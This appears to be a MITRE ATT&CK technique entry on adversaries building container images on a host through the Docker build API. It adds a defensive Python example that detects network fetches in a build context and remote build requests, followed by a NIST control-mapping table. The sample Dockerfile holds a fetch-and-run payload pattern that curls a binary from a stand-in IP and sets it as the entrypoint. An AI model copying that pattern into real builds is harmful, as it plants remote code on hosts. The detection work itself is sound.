Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)
An adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then deploy a container from that custom image (Deploy Container).(Citation: Aqua Build Images on Hosts) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious, since it is a vanilla image; the malicious content is introduced only in the layers built on top of it. If the base image already resides in a local registry, the pull may be considered even less suspicious, since the image is already in the environment.
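The two artefacts a defender can actually inspect here are the build context sent to the daemon (a tar archive containing the Dockerfile, posted to the <code>/build</code> endpoint) and the API requests that reach the daemon. The following is an added example, not code from ATT&CK or from the cited sources: it packages a constructed Dockerfile the way a client would for <code>POST /build</code>, then unpacks it and reports the vanilla <code>FROM</code> alongside any <code>RUN</code>/<code>ADD</code> instruction that fetches content from the network at build time, and separately flags <code>build</code> requests that arrive from a non-loopback source. The Dockerfile, the IP addresses and the access-log line format are all assumptions made for the example; real Docker deployments normally obtain equivalent request logs from an audit proxy in front of the socket or from the daemon's debug log.

```python
import io
import re
import tarfile

# Constructed sample Dockerfile: a vanilla base image with the payload pulled
# in during the build. Illustrative input only, not from any real incident.
SAMPLE_DOCKERFILE = b"""\
FROM alpine:3.19
RUN apk add --no-cache curl \\
 && curl -fsSL http://198.51.100.23/agent -o /usr/local/bin/agent \\
 && chmod +x /usr/local/bin/agent
ADD https://198.51.100.23/conf /etc/agent.conf
ENTRYPOINT ["/usr/local/bin/agent"]
"""

# Constructed daemon access-log lines. The "<ts> <src> <method> <path>" layout
# is an assumption of this example, not a documented Docker log format.
SAMPLE_API_LOG = [
    "2024-03-01T10:00:01Z 127.0.0.1 POST /v1.43/images/create?fromImage=alpine&tag=3.19",
    "2024-03-01T10:00:05Z 10.0.0.42 POST /v1.43/build?t=internal/agent:latest",
    "2024-03-01T10:00:09Z 10.0.0.42 POST /v1.43/containers/create?name=agent",
    "2024-03-01T10:01:00Z 127.0.0.1 GET /v1.43/containers/json",
]


def make_build_context(dockerfile: bytes) -> bytes:
    """Package a Dockerfile as the tar archive a client sends to POST /build."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo("Dockerfile")
        info.size = len(dockerfile)
        tar.addfile(info, io.BytesIO(dockerfile))
    return buf.getvalue()


def extract_dockerfile(context: bytes, name: str = "Dockerfile") -> str:
    """Pull the Dockerfile back out of a build-context tarball."""
    with tarfile.open(fileobj=io.BytesIO(context), mode="r") as tar:
        try:
            member = tar.getmember(name)
        except KeyError:
            raise ValueError(f"no {name} in build context") from None
        return tar.extractfile(member).read().decode("utf-8", errors="replace")


def dockerfile_instructions(text: str):
    """Yield (INSTRUCTION, argument) pairs, joining backslash line continuations."""
    logical = re.sub(r"\\\n", " ", text)
    for line in logical.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        yield parts[0].upper(), (parts[1] if len(parts) > 1 else "")


# Download tools or URLs appearing in build-time instructions.
FETCH_RE = re.compile(r"\b(curl|wget|fetch|Invoke-WebRequest)\b|https?://", re.I)


def find_remote_fetches(text: str):
    """Report the base image and every RUN/ADD that pulls content from the network.

    FROM is reported too, so an analyst sees that the base is vanilla while the
    layers built on top of it are what fetch the payload."""
    findings = []
    for instr, arg in dockerfile_instructions(text):
        if instr == "FROM":
            findings.append(("FROM", arg))
        elif instr in ("RUN", "ADD") and FETCH_RE.search(arg):
            findings.append((instr, arg))
    return findings


API_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<path>/v[\d.]+/(?P<ep>\w+))"
)


def flag_remote_builds(lines):
    """Return (timestamp, source, path) for build requests not from loopback."""
    hits = []
    for line in lines:
        m = API_RE.match(line)
        if not m:
            continue
        if m["method"] == "POST" and m["ep"] == "build" and not m["src"].startswith("127."):
            hits.append((m["ts"], m["src"], m["path"]))
    return hits


if __name__ == "__main__":
    context = make_build_context(SAMPLE_DOCKERFILE)
    for instr, arg in find_remote_fetches(extract_dockerfile(context)):
        print(f"{instr:<5} {arg}")
    for ts, src, path in flag_remote_builds(SAMPLE_API_LOG):
        print(f"remote build request at {ts} from {src}: {path}")
```

The build-context check is what an admission or CI gate can apply before the daemon executes the build; the request check is the SI-4 / SC-7 side, where a <code>build</code> call from anywhere other than the local socket or an approved build host is itself the signal, regardless of how benign the base image looks.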
Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
AC-17 | Remote Access | Protects | T1612 | Build Image on Host | |
AC-2 | Account Management | Protects | T1612 | Build Image on Host | |
AC-3 | Access Enforcement | Protects | T1612 | Build Image on Host | |
AC-6 | Least Privilege | Protects | T1612 | Build Image on Host | |
CA-8 | Penetration Testing | Protects | T1612 | Build Image on Host | |
CM-6 | Configuration Settings | Protects | T1612 | Build Image on Host | |
CM-7 | Least Functionality | Protects | T1612 | Build Image on Host | |
RA-5 | Vulnerability Monitoring and Scanning | Protects | T1612 | Build Image on Host | |
SA-11 | Developer Testing and Evaluation | Protects | T1612 | Build Image on Host | |
SC-7 | Boundary Protection | Protects | T1612 | Build Image on Host | |
SI-4 | System Monitoring | Protects | T1612 | Build Image on Host | |
action.malware.variety.Unknown | Unknown | related-to | T1612 | Build Image on Host | |